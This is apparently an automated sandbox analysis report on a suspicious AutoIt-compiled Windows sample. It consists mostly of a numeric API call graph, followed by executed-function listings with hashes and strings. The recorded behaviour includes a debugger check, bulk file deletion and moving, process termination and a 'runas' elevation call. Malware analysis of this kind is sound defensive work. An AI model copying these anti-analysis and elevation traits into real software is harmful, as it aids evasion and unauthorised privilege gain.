768799 94131->94132 94133 6fc92d 39 API calls 94131->94133 94134 6f8e70 52 API calls 94132->94134 94147 768973 94132->94147 94133->94132 94135 76887c 94134->94135 94136 6f557e 9 API calls 94135->94136 94137 7688a7 94136->94137 94457 71d913 94137->94457 94139 7688cd 94140 7688f7 GetCurrentDirectoryW SetCurrentDirectoryW 94139->94140 94141 768921 94140->94141 94140->94147 94142 75e387 4 API calls 94141->94142 94143 76892a 94142->94143 94144 75e9c5 GetFileAttributesW 94143->94144 94143->94147 94145 768938 94144->94145 94146 768940 GetFileAttributesW SetFileAttributesW 94145->94146 94153 7689cb 94145->94153 94148 7689b1 94146->94148 94149 768969 SetCurrentDirectoryW 94146->94149 94147->93914 94150 7689b5 SetCurrentDirectoryW 94148->94150 94151 768a02 SetCurrentDirectoryW 94148->94151 94149->94147 94150->94153 94151->94147 94460 769f9f FindFirstFileW 94153->94460 94154 7689ea 94154->94151 94156 765ef4 94155->94156 94157 765fbd 94155->94157 94158 6fc92d 39 API calls 94156->94158 94160 6f8e70 52 API calls 94157->94160 94169 766011 94157->94169 94159 765eff 94158->94159 94161 6fc92d 39 API calls 94159->94161 94162 765fef 94160->94162 94163 765f15 94161->94163 94164 6f8e70 52 API calls 94162->94164 94163->94157 94166 6fbf07 8 API calls 94163->94166 94165 766001 94164->94165 94504 75d836 94165->94504 94168 765f26 94166->94168 94170 6fbf07 8 API calls 94168->94170 94169->93914 94171 765f2f 94170->94171 94172 6f8e70 52 API calls 94171->94172 94173 765f3c 94172->94173 94174 6f694e 8 API calls 94173->94174 94175 765f4f 94174->94175 94176 6f7af4 8 API calls 94175->94176 94177 765f60 94176->94177 94184 765f89 94177->94184 94547 75dc8e 94177->94547 94180 6fc92d 39 API calls 94180->94157 94181 6fb25f 8 API calls 94182 765f80 94181->94182 94183 75da81 12 API calls 94182->94183 94183->94184 94184->94180 94186 6fbf07 8 API calls 94185->94186 94187 768e4a 94186->94187 94188 71019b 8 API calls 94187->94188 94189 768e54 94188->94189 94190 6f41a6 8 API calls 94189->94190 94191 768e5e 94190->94191 94192 6f8e70 52 API calls 94191->94192 94193 768e6d 94192->94193 94194 6f557e 9 API calls 94193->94194 94195 768e78 94194->94195 94196 6f8e70 52 API calls 94195->94196 94197 768e85 94196->94197 94198 6f8e70 52 API calls 94197->94198 94199 768e97 94198->94199 94200 6f8e70 52 API calls 94199->94200 94201 768eac GetPrivateProfileStringW 94200->94201 94202 6f6ab6 8 API calls 94201->94202 94203 768ecf ISource 94202->94203 94203->93914 94205 6fc92d 39 API calls 94204->94205 94206 70f972 94205->94206 94207 74fac0 Sleep 94206->94207 94208 70f97a timeGetTime 94206->94208 94209 6fc92d 39 API calls 94208->94209 94210 70f990 94209->94210 94210->93914 94212 6f8e70 52 API calls 94211->94212 94213 766577 94212->94213 94617 75db69 94213->94617 94215 76657f 94216 766583 GetLastError 94215->94216 94217 766598 94215->94217 94216->94217 94217->93914 94219 75e9d1 94218->94219 94219->93914 94221 6f8e70 52 API calls 94220->94221 94222 766d47 94221->94222 94223 766d84 94222->94223 94224 6fc92d 39 API calls 94222->94224 94642 75e783 94223->94642 94226 766d76 94224->94226 94226->94223 94228 6f557e 9 API calls 94226->94228 94228->94223 94230 6f8e70 52 API calls 94232 766d92 94230->94232 94231 766dd7 94231->93914 94647 6f7a59 8 API calls 94232->94647 94648 7788b6 94233->94648 94235 779efa 94235->93914 94236->93873 94237->93876 94238->93888 94239->93900 94240->93900 94241->93875 94242->93887 94243->93887 94244->93887 94245->93904 94246->93887 94248 6fbf07 8 API calls 94247->94248 94249 759b6d 94248->94249 94250 6f7a14 8 API calls 94249->94250 94251 759b81 94250->94251 94252 7596e3 41 API calls 94251->94252 94255 759ba3 94251->94255 94254 759b9d 94252->94254 94254->94255 94256 6f8685 8 API calls 94254->94256 94257 6f8685 8 API calls 94255->94257 94258 759c42 94255->94258 94259 6f7af4 8 API calls 94255->94259 94262 759c26 94255->94262 94267 7596e3 94255->94267 94256->94255 94257->94255 94260 6fbe6d 8 API calls 94258->94260 94261 759c51 94258->94261 94259->94255 94260->94261 94261->93958 94263 6f8685 8 API calls 94262->94263 94264 759c36 94263->94264 94265 6f7af4 8 API calls 94264->94265 94265->94258 94266->93960 94268 759703 _wcslen 94267->94268 94269 7597f2 94268->94269 94270 759738 94268->94270 94272 7597f7 94268->94272 94269->94255 94270->94269 94271 70e2e5 41 API calls 94270->94271 94271->94270 94272->94269 94273 70e2e5 41 API calls 94272->94273 94273->94272 94284 75e723 94274->94284 94276 75dce9 Process32NextW 94277 75dd9b CloseHandle 94276->94277 94283 75dce2 94276->94283 94277->93965 94278 6fbf07 8 API calls 94278->94283 94279 6fb25f 8 API calls 94279->94283 94280 6f694e 8 API calls 94280->94283 94281 6f7af4 8 API calls 94281->94283 94282 70e2e5 41 API calls 94282->94283 94283->94276 94283->94277 94283->94278 94283->94279 94283->94280 94283->94281 94283->94282 94289 75e72e 94284->94289 94285 75e745 94291 71668b 39 API calls 94285->94291 94288 75e74b 94288->94283 94289->94285 94289->94288 94290 716742 GetStringTypeW 94289->94290 94290->94289 94291->94288 94293 75e3a5 GetFileAttributesW 94292->94293 94294 75e3cf 94292->94294 94293->94294 94295 75e3b1 FindFirstFileW 94293->94295 94294->93970 94295->94294 94296 75e3c2 FindClose 94295->94296 94296->94294 94298 6fbceb 8 API calls 94297->94298 94299 77d6bf 94298->94299 94300 6fbceb 8 API calls 94299->94300 94301 77d6c7 94300->94301 94302 6fbceb 8 API calls 94301->94302 94303 77d6cf 94302->94303 94304 77d737 94303->94304 94305 6f627c 8 API calls 94303->94305 94306 6fbceb 8 API calls 94304->94306 94307 77d6e5 94305->94307 94309 77d735 94306->94309 94307->94304 94308 6f627c 8 API calls 94307->94308 94310 77d6f7 94308->94310 94312 6f8685 8 API calls 94309->94312 94310->94304 94311 77d6fc 94310->94311 94313 6f96d9 8 API calls 94311->94313 94314 77d760 94312->94314 94317 77d707 94313->94317 94315 6f8685 8 API calls 94314->94315 94316 77d777 94315->94316 94318 6f79ed 8 API calls 94316->94318 94320 6f8685 8 API calls 94317->94320 94319 77d780 94318->94319 94319->93982 94321 77d728 94320->94321 94322 6f96d9 8 API calls 94321->94322 94322->94309 94324 6fc269 8 API calls 94323->94324 94325 77d30e CharUpperBuffW 94324->94325 94326 77d329 94325->94326 94327 6fbf07 8 API calls 94326->94327 94328 77d334 94327->94328 94329 6f8685 8 API calls 94328->94329 94330 77d347 _wcslen 94329->94330 94331 6f79ed 8 API calls 94330->94331 94332 77d3a4 _wcslen 94330->94332 94331->94332 94332->93984 94334 6fc93e 94333->94334 94335 6fc945 94333->94335 94334->94335 94340 716661 39 API calls 94334->94340 94335->94036 94337 6fc988 94337->94036 94338->94051 94339->94057 94340->94337 94342 7617cb 94341->94342 94343 71016b 8 API calls 94342->94343 94344 7617d2 94343->94344 94347 75fbca 94344->94347 94346 76180c 94346->94065 94348 6fc269 8 API calls 94347->94348 94349 75fbdd CharLowerBuffW 94348->94349 94353 75fbf0 94349->94353 94350 75fc2e 94352 75fc40 94350->94352 94354 6f627c 8 API calls 94350->94354 94351 6f627c 8 API calls 94351->94353 94355 71019b 8 API calls 94352->94355 94353->94350 94353->94351 94364 75fbfa ___scrt_fastfail 94353->94364 94354->94352 94358 75fc6e 94355->94358 94360 75fc90 94358->94360 94380 75fb02 8 API calls 94358->94380 94359 75fccd 94361 71016b 8 API calls 94359->94361 94359->94364 94365 75fd21 94360->94365 94362 75fce7 94361->94362 94363 71019b 8 API calls 94362->94363 94363->94364 94364->94346 94366 6fbf07 8 API calls 94365->94366 94367 75fd53 94366->94367 94368 6fbf07 8 API calls 94367->94368 94369 75fd5c 94368->94369 94370 6fbf07 8 API calls 94369->94370 94372 75fd65 94370->94372 94371 760029 94371->94359 94372->94371 94373 6f84b7 8 API calls 94372->94373 94374 716718 GetStringTypeW 94372->94374 94376 716661 39 API calls 94372->94376 94377 75fd21 40 API calls 94372->94377 94378 6facc0 8 API calls 94372->94378 94379 6fbe6d 8 API calls 94372->94379 94381 716742 GetStringTypeW 94372->94381 94373->94372 94374->94372 94376->94372 94377->94372 94378->94372 94379->94372 94380->94358 94381->94372 94383 6f79ed 8 API calls 94382->94383 94384 75dab6 GetFileAttributesW 94383->94384 94385 75daca GetLastError 94384->94385 94388 75dae3 94384->94388 94386 75dae5 94385->94386 94387 75dad7 CreateDirectoryW 94385->94387 94386->94388 94389 6f96d9 8 API calls 94386->94389 94387->94386 94387->94388 94388->94070 94390 75db27 94389->94390 94391 75da81 8 API calls 94390->94391 94392 75db30 94391->94392 94392->94388 94393 75db34 CreateDirectoryW 94392->94393 94393->94388 94395 73587b 94394->94395 94396 6f6ac6 94394->94396 94397 73588c 94395->94397 94398 6f84b7 8 API calls 94395->94398 94401 71016b 8 API calls 94396->94401 94399 6fbceb 8 API calls 94397->94399 94398->94397 94400 735896 94399->94400 94400->94400 94402 6f6ad9 94401->94402 94403 6f6af4 94402->94403 94404 6f6ae2 94402->94404 94406 6fbf07 8 API calls 94403->94406 94405 6fb25f 8 API calls 94404->94405 94407 6f6aea 94405->94407 94406->94407 94407->94074 94407->94078 94409 70c003 94408->94409 94410 70bfc7 94408->94410 94411 6fbceb 8 API calls 94409->94411 94410->94409 94414 70bfd6 94410->94414 94418 75d2ab 94411->94418 94412 70bfeb 94429 70c009 94412->94429 94413 75d249 2 API calls 94413->94418 94414->94412 94415 70bff8 94414->94415 94436 75d3b2 12 API calls 94415->94436 94416 75d2da 94416->94109 94418->94413 94418->94416 94437 6facc0 8 API calls __fread_nolock 94418->94437 94419 70bff4 94419->94109 94422->94120 94423->94119 94424->94122 94425->94126 94426->94078 94427->94078 94428->94116 94438 70c1f1 94429->94438 94434 70c03c 94434->94419 94435 6f8774 10 API calls 94435->94434 94436->94419 94437->94418 94439 71019b 8 API calls 94438->94439 94440 70c208 94439->94440 94441 71016b 8 API calls 94440->94441 94442 70c021 94441->94442 94443 6fadc1 94442->94443 94449 70feaa 94443->94449 94445 6fae07 94445->94434 94445->94435 94446 6fb050 2 API calls 94447 6fadd2 94446->94447 94447->94445 94447->94446 94456 6fb0e3 8 API calls __fread_nolock 94447->94456 94450 74fe13 94449->94450 94451 70febb 94449->94451 94452 71016b 8 API calls 94450->94452 94451->94447 94453 74fe1d 94452->94453 94454 71019b 8 API calls 94453->94454 94455 74fe32 94454->94455 94456->94447 94474 71d6be 94457->94474 94461 76a03a FindClose 94460->94461 94468 769fc9 94460->94468 94462 76a0e2 94461->94462 94463 76a04b FindFirstFileW 94461->94463 94462->94154 94471 76a060 94463->94471 94472 76a0d9 FindClose 94463->94472 94465 76a028 FindNextFileW 94465->94461 94465->94468 94466 76a0c7 FindNextFileW 94466->94471 94466->94472 94467 769ff7 GetFileAttributesW SetFileAttributesW 94467->94468 94469 76a0eb FindClose 94467->94469 94468->94465 94468->94467 94469->94462 94470 76a0a0 SetCurrentDirectoryW 94470->94471 94471->94466 94471->94470 94471->94472 94473 76a0c0 SetCurrentDirectoryW 94471->94473 94472->94462 94473->94466 94475 71d6d5 94474->94475 94476 71d89f 94474->94476 94475->94476 94480 71d740 94475->94480 94502 71f669 20 API calls _abort 94476->94502 94478 71d8af 94503 722b7c 26 API calls _abort 94478->94503 94481 71d764 94480->94481 94488 71d78b 94480->94488 94497 725153 26 API calls 2 library calls 94480->94497 94496 71f669 20 API calls _abort 94481->94496 94483 71d868 94483->94481 94486 71d774 94483->94486 94489 71d87b 94483->94489 94484 71d820 94484->94481 94487 71d841 94484->94487 94499 725153 26 API calls 2 library calls 94484->94499 94486->94139 94487->94481 94487->94486 94492 71d857 94487->94492 94488->94481 94495 71d7fd 94488->94495 94498 725153 26 API calls 2 library calls 94488->94498 94501 725153 26 API calls 2 library calls 94489->94501 94500 725153 26 API calls 2 library calls 94492->94500 94495->94483 94495->94484 94496->94486 94497->94488 94498->94495 94499->94487 94500->94486 94501->94486 94502->94478 94503->94486 94505 6fbf07 8 API calls 94504->94505 94506 75d853 94505->94506 94507 6fbf07 8 API calls 94506->94507 94508 75d85b 94507->94508 94509 6fbf07 8 API calls 94508->94509 94510 75d863 94509->94510 94511 6f557e 9 API calls 94510->94511 94512 75d86d 94511->94512 94513 6f557e 9 API calls 94512->94513 94514 75d877 94513->94514 94550 75e958 94514->94550 94516 75d882 94517 75e9c5 GetFileAttributesW 94516->94517 94518 75d88d 94517->94518 94519 75d89f 94518->94519 94520 6f65a4 8 API calls 94518->94520 94521 75e9c5 GetFileAttributesW 94519->94521 94520->94519 94522 75d8a7 94521->94522 94523 75d8b4 94522->94523 94524 6f65a4 8 API calls 94522->94524 94525 6fbf07 8 API calls 94523->94525 94524->94523 94526 75d8bc 94525->94526 94527 6fbf07 8 API calls 94526->94527 94528 75d8c4 94527->94528 94529 6f694e 8 API calls 94528->94529 94530 75d8d5 FindFirstFileW 94529->94530 94531 75da23 FindClose 94530->94531 94546 75d8f8 94530->94546 94535 75da21 94531->94535 94532 75d9ef FindNextFileW 94532->94546 94533 6fb25f 8 API calls 94533->94546 94535->94169 94536 6f7af4 8 API calls 94536->94546 94537 6f65a4 8 API calls 94537->94546 94538 75dc8e 4 API calls 94538->94546 94539 75d984 94541 70e2e5 41 API calls 94539->94541 94542 75d9ad MoveFileW 94539->94542 94544 75d99d DeleteFileW 94539->94544 94540 75da12 FindClose 94540->94535 94541->94539 94542->94546 94543 75da5c CopyFileExW 94543->94546 94544->94546 94545 75d9ca DeleteFileW 94545->94546 94546->94531 94546->94532 94546->94533 94546->94536 94546->94537 94546->94538 94546->94539 94546->94540 94546->94543 94546->94545 94561 75df85 94546->94561 94548 75e387 4 API calls 94547->94548 94549 75dc95 94548->94549 94549->94181 94549->94184 94551 6fbf07 8 API calls 94550->94551 94552 75e96d 94551->94552 94553 6fbf07 8 API calls 94552->94553 94554 75e975 94553->94554 94555 6f694e 8 API calls 94554->94555 94556 75e984 94555->94556 94557 6f694e 8 API calls 94556->94557 94558 75e994 94557->94558 94559 70e2e5 41 API calls 94558->94559 94560 75e9a9 94559->94560 94560->94516 94562 75dfa1 94561->94562 94563 75dfa6 94562->94563 94564 75dfbc 94562->94564 94565 75dfb7 94563->94565 94567 6fbe6d 8 API calls 94563->94567 94566 6fbf07 8 API calls 94564->94566 94565->94546 94568 75dfc4 94566->94568 94567->94565 94569 6fbf07 8 API calls 94568->94569 94570 75dfcc 94569->94570 94571 6fbf07 8 API calls 94570->94571 94572 75dfd7 94571->94572 94573 6fbf07 8 API calls 94572->94573 94574 75dfdf 94573->94574 94575 6fbf07 8 API calls 94574->94575 94576 75dfe7 94575->94576 94577 6fbf07 8 API calls 94576->94577 94578 75dfef 94577->94578 94579 6fbf07 8 API calls 94578->94579 94580 75dff7 94579->94580 94581 6fbf07 8 API calls 94580->94581 94582 75dfff 94581->94582 94583 6f694e 8 API calls 94582->94583 94584 75e016 94583->94584 94585 6f694e 8 API calls 94584->94585 94586 75e02f 94585->94586 94587 6f627c 8 API calls 94586->94587 94588 75e03b 94587->94588 94589 75e04e 94588->94589 94591 6f96d9 8 API calls 94588->94591 94590 6f627c 8 API calls 94589->94590 94592 75e057 94590->94592 94591->94589 94593 75e067 94592->94593 94594 6f96d9 8 API calls 94592->94594 94595 75e079 94593->94595 94596 6fbe6d 8 API calls 94593->94596 94594->94593 94597 6f7af4 8 API calls 94595->94597 94596->94595 94598 75e084 94597->94598 94615 75e141 8 API calls 94598->94615 94600 75e093 94616 75e141 8 API calls 94600->94616 94602 75e0a6 94603 6f627c 8 API calls 94602->94603 94604 75e0b0 94603->94604 94605 75e0b5 94604->94605 94606 75e0c7 94604->94606 94607 6f65a4 8 API calls 94605->94607 94608 6f627c 8 API calls 94606->94608 94610 75e0c2 94607->94610 94609 75e0d0 94608->94609 94611 75e0ee 94609->94611 94612 6f65a4 8 API calls 94609->94612 94613 6f7af4 8 API calls 94610->94613 94614 6f7af4 8 API calls 94611->94614 94612->94610 94613->94611 94614->94565 94615->94600 94616->94602 94618 6fbf07 8 API calls 94617->94618 94619 75db88 94618->94619 94620 6fbf07 8 API calls 94619->94620 94621 75db91 94620->94621 94622 6fbf07 8 API calls 94621->94622 94623 75db9a 94622->94623 94624 6f557e 9 API calls 94623->94624 94625 75dba5 94624->94625 94626 75e9c5 GetFileAttributesW 94625->94626 94627 75dbae 94626->94627 94628 75dbc0 94627->94628 94629 6f65a4 8 API calls 94627->94629 94630 6f694e 8 API calls 94628->94630 94629->94628 94631 75dbd4 FindFirstFileW 94630->94631 94632 75dc60 FindClose 94631->94632 94638 75dbf3 94631->94638 94636 75dc6b 94632->94636 94633 75dc3b FindNextFileW 94635 75dc4f 94633->94635 94633->94638 94634 6fbe6d 8 API calls 94634->94638 94635->94638 94636->94215 94637 6f7af4 8 API calls 94637->94638 94638->94632 94638->94633 94638->94634 94638->94637 94639 6f65a4 8 API calls 94638->94639 94640 75dc2c DeleteFileW 94639->94640 94640->94633 94641 75dc57 FindClose 94640->94641 94641->94636 94643 7322f0 __wsopen_s 94642->94643 94644 75e790 GetShortPathNameW 94643->94644 94645 6f84b7 8 API calls 94644->94645 94646 75e7b8 94645->94646 94646->94230 94646->94232 94647->94231 94649 6f8e70 52 API calls 94648->94649 94650 7788ed 94649->94650 94653 778932 ISource 94650->94653 94686 779632 94650->94686 94652 778dac 94743 779843 59 API calls 94652->94743 94653->94235 94656 778dbb 94658 778dc7 94656->94658 94659 778bec 94656->94659 94657 7789a6 94657->94653 94660 6f8e70 52 API calls 94657->94660 94673 778bde 94657->94673 94739 754a0c 8 API calls __fread_nolock 94657->94739 94740 778e7c 41 API calls 94657->94740 94658->94653 94699 7787e3 94659->94699 94660->94657 94665 778c25 94713 710000 94665->94713 94668 778c45 94741 763ef6 81 API calls __wsopen_s 94668->94741 94669 778c5f 94671 6f7d51 8 API calls 94669->94671 94674 778c6e 94671->94674 94672 778c50 GetCurrentProcess TerminateProcess 94672->94669 94673->94652 94673->94659 94675 6f83b0 8 API calls 94674->94675 94676 778c87 94675->94676 94677 701c50 8 API calls 94676->94677 94685 778caf 94676->94685 94679 778c9e 94677->94679 94678 778e22 94678->94653 94680 778e36 FreeLibrary 94678->94680 94681 7794da 74 API calls 94679->94681 94680->94653 94681->94685 94685->94678 94717 701c50 94685->94717 94728 7794da 94685->94728 94742 6fb3fe 8 API calls 94685->94742 94687 6fc269 8 API calls 94686->94687 94688 77964d CharLowerBuffW 94687->94688 94689 7596e3 41 API calls 94688->94689 94690 77966e 94689->94690 94692 6fbf07 8 API calls 94690->94692 94698 7796a7 _wcslen 94690->94698 94693 779689 94692->94693 94694 6f8685 8 API calls 94693->94694 94695 77969d 94694->94695 94696 6f96d9 8 API calls 94695->94696 94696->94698 94697 7797bd _wcslen 94697->94657 94698->94697 94744 778e7c 41 API calls 94698->94744 94700 7787fe 94699->94700 94701 778849 94699->94701 94702 71019b 8 API calls 94700->94702 94705 7799f5 94701->94705 94703 778820 94702->94703 94703->94701 94704 71016b 8 API calls 94703->94704 94704->94703 94706 779c0a ISource 94705->94706 94711 779a19 _strcat _wcslen ___std_exception_copy 94705->94711 94706->94665 94707 6fc92d 39 API calls 94707->94711 94708 6fc5df 39 API calls 94708->94711 94709 6fc9fb 39 API calls 94709->94711 94710 6f8e70 52 API calls 94710->94711 94711->94706 94711->94707 94711->94708 94711->94709 94711->94710 94745 75f7da 10 API calls _wcslen 94711->94745 94714 710015 94713->94714 94715 7100ad ResumeThread 94714->94715 94716 71007b 94714->94716 94715->94716 94716->94668 94716->94669 94718 701c62 94717->94718 94722 701c6b 94718->94722 94746 70b71c 8 API calls 94718->94746 94720 701d20 94720->94685 94721 71016b 8 API calls 94723 701d89 94721->94723 94722->94720 94722->94721 94724 71016b 8 API calls 94723->94724 94725 701d92 94724->94725 94726 6fb25f 8 API calls 94725->94726 94727 701da1 94726->94727 94727->94685 94729 7794f2 94728->94729 94738 77950e 94728->94738 94730 7795c3 94729->94730 94731 77951a 94729->94731 94732 7794f9 94729->94732 94729->94738 94748 7615b3 72 API calls ISource 94730->94748 94735 6f6ab6 8 API calls 94731->94735 94747 75f3fd 10 API calls _strlen 94732->94747 94735->94738 94736 779503 94737 6f6ab6 8 API calls 94736->94737 94737->94738 94738->94685 94739->94657 94740->94657 94741->94672 94742->94685 94743->94656 94744->94697 94745->94711 94746->94722 94747->94736 94748->94738 94749 71f08e 94750 71f09a ___BuildCatchObject 94749->94750 94751 71f0a6 94750->94751 94752 71f0bb 94750->94752 94768 71f669 20 API calls _abort 94751->94768 94762 71951d EnterCriticalSection 94752->94762 94755 71f0c7 94763 71f0fb 94755->94763 94756 71f0ab 94769 722b7c 26 API calls _abort 94756->94769 94760 71f0b6 __fread_nolock 94762->94755 94771 71f126 94763->94771 94765 71f108 94766 71f0d4 94765->94766 94791 71f669 20 API calls _abort 94765->94791 94770 71f0f1 LeaveCriticalSection __fread_nolock 94766->94770 94768->94756 94769->94760 94770->94760 94772 71f134 94771->94772 94773 71f14e 94771->94773 94795 71f669 20 API calls _abort 94772->94795 94775 71dce5 __fread_nolock 26 API calls 94773->94775 94777 71f157 94775->94777 94776 71f139 94796 722b7c 26 API calls _abort 94776->94796 94792 729799 94777->94792 94781 71f25b 94783 71f268 94781->94783 94790 71f20e 94781->94790 94782 71f1df 94785 71f1fc 94782->94785 94782->94790 94798 71f669 20 API calls _abort 94783->94798 94797 71f43f 31 API calls 4 library calls 94785->94797 94787 71f206 94788 71f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 94787->94788 94788->94765 94790->94788 94799 71f2bb 30 API calls 2 library calls 94790->94799 94791->94766 94800 729616 94792->94800 94794 71f173 94794->94781 94794->94782 94794->94788 94795->94776 94796->94788 94797->94787 94798->94788 94799->94788 94801 729622 ___BuildCatchObject 94800->94801 94802 729642 94801->94802 94803 72962a 94801->94803 94805 7296f6 94802->94805 94810 72967a 94802->94810 94835 71f656 20 API calls _abort 94803->94835 94840 71f656 20 API calls _abort 94805->94840 94806 72962f 94836 71f669 20 API calls _abort 94806->94836 94809 7296fb 94841 71f669 20 API calls _abort 94809->94841 94825 7254d7 EnterCriticalSection 94810->94825 94813 729703 94842 722b7c 26 API calls _abort 94813->94842 94814 729680 94816 7296a4 94814->94816 94817 7296b9 94814->94817 94837 71f669 20 API calls _abort 94816->94837 94826 72971b 94817->94826 94820 729637 __fread_nolock 94820->94794 94821 7296b4 94839 7296ee LeaveCriticalSection __wsopen_s 94821->94839 94822 7296a9 94838 71f656 20 API calls _abort 94822->94838 94825->94814 94827 725754 __wsopen_s 26 API calls 94826->94827 94828 72972d 94827->94828 94829 729746 SetFilePointerEx 94828->94829 94830 729735 94828->94830 94831 72975e GetLastError 94829->94831 94832 72973a 94829->94832 94843 71f669 20 API calls _abort 94830->94843 94844 71f633 20 API calls 2 library calls 94831->94844 94832->94821 94835->94806 94836->94820 94837->94822 94838->94821 94839->94820 94840->94809 94841->94813 94842->94820 94843->94832 94844->94832 94845 7015af 94846 70e34f 8 API calls 94845->94846 94847 7015c5 94846->94847 94852 70e3b3 94847->94852 94849 7015ef 94850 7461ab 94849->94850 94864 763ef6 81 API calls __wsopen_s 94849->94864 94853 6f7a14 8 API calls 94852->94853 94854 70e3ea 94853->94854 94855 6fb25f 8 API calls 94854->94855 94857 70e41b 94854->94857 94856 74e4e4 94855->94856 94858 6f7af4 8 API calls 94856->94858 94857->94849 94859 74e4ef 94858->94859 94865 70e73b 39 API calls 94859->94865 94861 74e502 94863 74e506 94861->94863 94866 6fb3fe 8 API calls 94861->94866 94863->94863 94864->94850 94865->94861 94866->94863

                                        Executed Functions

                                        Function 006F5D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 278 6f5d78-6f5de7 call 6fbf07 GetVersionExW call 6f84b7 283 6f5ded 278->283 284 734f0c-734f1f 278->284 285 6f5def-6f5df1 283->285 286 734f20-734f24 284->286 287 734f4b 285->287 288 6f5df7-6f5e56 call 6f96d9 call 6f79ed 285->288 289 734f27-734f33 286->289 290 734f26 286->290 294 734f52-734f5e 287->294 303 6f5e5c-6f5e5e 288->303 304 7350ad-7350b4 288->304 289->286 291 734f35-734f37 289->291 290->289 291->285 293 734f3d-734f44 291->293 293->284 296 734f46 293->296 297 6f5ecc-6f5ee6 GetCurrentProcess IsWow64Process 294->297 296->287 299 6f5ee8 297->299 300 6f5f45-6f5f4b 297->300 302 6f5eee-6f5efa 299->302 300->302 305 7350f2-7350f6 GetSystemInfo 302->305 306 6f5f00-6f5f0f LoadLibraryA 302->306 307 6f5e64-6f5e67 303->307 308 734fae-734fc1 303->308 309 7350b6 304->309 310 7350d4-7350d7 304->310 313 6f5f4d-6f5f57 GetSystemInfo 306->313 314 6f5f11-6f5f1f GetProcAddress 306->314 307->297 315 6f5e69-6f5eab 307->315 316 734fc3-734fcc 308->316 317 734fea-734fec 308->317 318 7350bc 309->318 311 7350c2-7350ca 310->311 312 7350d9-7350e8 310->312 311->310 312->318 321 7350ea-7350f0 312->321 323 6f5f27-6f5f29 313->323 314->313 322 6f5f21-6f5f25 GetNativeSystemInfo 314->322 315->297 324 6f5ead-6f5eb0 315->324 325 734fd9-734fe5 316->325 326 734fce-734fd4 316->326 319 735021-735024 317->319 320 734fee-735003 317->320 318->311 329 735026-735041 319->329 330 73505f-735062 319->330 327 735010-73501c 320->327 328 735005-73500b 320->328 321->311 322->323 331 6f5f2b-6f5f2c FreeLibrary 323->331 332 6f5f32-6f5f44 323->332 333 734f63-734f6d 324->333 334 6f5eb6-6f5ec0 324->334 325->297 326->297 327->297 328->297 336 735043-735049 329->336 337 73504e-73505a 329->337 330->297 340 735068-73508f 330->340 331->332 338 734f80-734f8a 333->338 339 734f6f-734f7b 333->339 334->294 335 6f5ec6 334->335 335->297 336->297 337->297 341 734f9d-734fa9 338->341 342 734f8c-734f98 338->342 339->297 343 735091-735097 340->343 344 73509c-7350a8 340->344 341->297 342->297 343->297 344->297
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 006F5DA7
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        • GetCurrentProcess.KERNEL32(?,0078DC2C,00000000,?,?), ref: 006F5ED3
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 006F5EDA
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006F5F05
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006F5F17
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006F5F25
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 006F5F2C
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 006F5F51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: 5d8ddafde8a715631476c993714eb200a10db8fee3cc28669bef09d678f2ea20
                                        • Instruction ID: dc3fb76b4afa7cf9a2773473ec6d71fe62d22a0c37a0d915190bf298c62aa605
                                        • Opcode Fuzzy Hash: 5d8ddafde8a715631476c993714eb200a10db8fee3cc28669bef09d678f2ea20
                                        • Instruction Fuzzy Hash: 41A1C23281A7C5CFD716CBB87C449A97FA56B26300F18D99CE68193273D22C494ACB3D
                                        Function 006F3312 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F32EF,?), ref: 006F3342
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F32EF,?), ref: 006F3355
                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F32EF,?), ref: 006F33C1
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                          • Part of subcall function 006F41E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006F33E9,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F4227
                                        • SetCurrentDirectoryW.KERNELBASE(?,00000001,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F3442
                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00733C8A
                                        • SetCurrentDirectoryW.KERNEL32(?,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 00733CCB
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007B31F4,007C2418,?,?,?,?,?,?,?,006F32EF), ref: 00733D54
                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00733D5B
